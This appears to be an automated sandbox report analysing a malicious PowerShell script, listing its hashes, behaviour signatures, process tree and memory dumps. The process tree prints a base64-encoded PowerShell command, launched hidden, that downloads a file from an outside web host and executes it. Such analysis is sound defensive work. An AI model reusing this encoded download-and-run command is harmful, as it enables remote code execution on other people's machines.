Analysis

  • max time kernel
    25s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-08-2021 20:27

General

  • Target
    work.ps1
  • Size
    1.4MB
  • MD5
    7ba4b5c5d3e3276a3cfe8d581cf7173b
  • SHA1
    79ba87b46562e75f097c1b6d23d3b63b9160bbaa
  • SHA256
    73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022
  • SHA512
    ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\work.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2092
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 2092 -s 2488
        3⤵
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1316

Network

MITRE ATT&CK Matrix

Downloads

  • memory/2092-176-0x000001FE45040000-0x000001FE45042000-memory.dmp
    Filesize: 8KB
  • memory/2092-177-0x000001FE45043000-0x000001FE45045000-memory.dmp
    Filesize: 8KB
  • memory/2092-181-0x000001FE45046000-0x000001FE45048000-memory.dmp
    Filesize: 8KB
  • memory/4044-118-0x0000024BA6130000-0x0000024BA6131000-memory.dmp
    Filesize: 4KB
  • memory/4044-121-0x0000024BA6330000-0x0000024BA6331000-memory.dmp
    Filesize: 4KB
  • memory/4044-122-0x0000024BA61A0000-0x0000024BA61A2000-memory.dmp
    Filesize: 8KB
  • memory/4044-123-0x0000024BA61A3000-0x0000024BA61A5000-memory.dmp
    Filesize: 8KB
  • memory/4044-142-0x0000024BA61A6000-0x0000024BA61A8000-memory.dmp
    Filesize: 8KB
  • memory/4044-180-0x0000024BA61A8000-0x0000024BA61A9000-memory.dmp
    Filesize: 4KB